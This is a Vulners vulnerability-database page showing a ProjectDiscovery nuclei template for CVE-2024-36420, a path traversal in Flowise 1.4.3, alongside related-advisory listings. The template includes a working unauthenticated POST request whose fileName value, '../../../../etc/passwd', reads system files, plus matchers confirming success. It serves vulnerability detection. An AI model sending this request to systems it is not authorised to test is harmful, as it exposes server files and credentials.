Lucene search
+L

Flowise 1.4.3 - Arbitrary File Read

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

Flowise 1.4.3 path traversal via fileName in /api/v1/openai-assistants-file enables file reads.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Injection in Flowiseai Flowise
19 May 202606:56
githubexploit
githubexploit
GithubExploit
Exploit for Infinite Loop in Dbgpt Db-Gpt
25 May 202609:29
githubexploit
circl
Circl
CVE-2024-36420
17 Jul 202609:00
circl
cnnvd
CNNVD
Flowise Security Vulnerabilities
1 Jul 202400:00
cnnvd
cve
CVE
CVE-2024-36420
1 Jul 202415:53
cve
cvelist
Cvelist
CVE-2024-36420 GHSL-2023-232: Flowise Path Injection at /api/v1/openai-assistants-file
1 Jul 202415:53
cvelist
euvd
EUVD
EUVD-2024-2594
3 Oct 202520:07
euvd
github
Github Security Blog
Flowise Path Injection at /api/v1/openai-assistants-file
5 Aug 202421:29
github
kitploit
Kitploit
POC_CVE-2024-36420
9 Sep 202614:42
kitploit
kitploit
Kitploit
POC_CVE-2024-10829
10 Sep 202603:40
kitploit
Rows per page
id: CVE-2024-36420

info:
  name: Flowise 1.4.3 - Arbitrary File Read
  author: fineman999
  severity: high
  description: |
    Flowise 1.4.3 contains a path traversal caused by lack of sanitization of 'fileName' parameter in /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files, exploit requires attacker to send crafted request.
  impact: |
    Attackers can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    No known patches available; consider applying input validation and sanitization to 'fileName' parameter or upgrade when patches are released.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36420
    - https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
    - https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982
  classification:
    cve-id: CVE-2024-36420
    epss-score: 0.01776
    epss-percentile: 0.76886
    cwe-id: CWE-22
    cvss-score: 7.5
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  metadata:
    verified: true
    vendor: flowiseai
    product: flowise
    max-request: 1
  tags: cve,cve2024,flowise,lfi,unauth,vuln,vkev

http:
  - raw:
      - |
        POST /api/v1/openai-assistants-file HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"fileName":"../../../../etc/passwd"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "(?m)^root:[^:]*:0:0:"
          - "(?m)^daemon:[^:]*:[0-9]+:[0-9]+:"

      - type: word
        part: header
        words:
          - "attachment; filename=passwd"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022043a05a68fba5993b1ea6f66d92dc799114b4a1716242257f7edd244f2b2d53980221009c4ce7b6d2330222278001c1b7aecb5a82482fcdc8ffaedbbbbeeee80d486736:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2026 07:40Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.01776
SSVC
38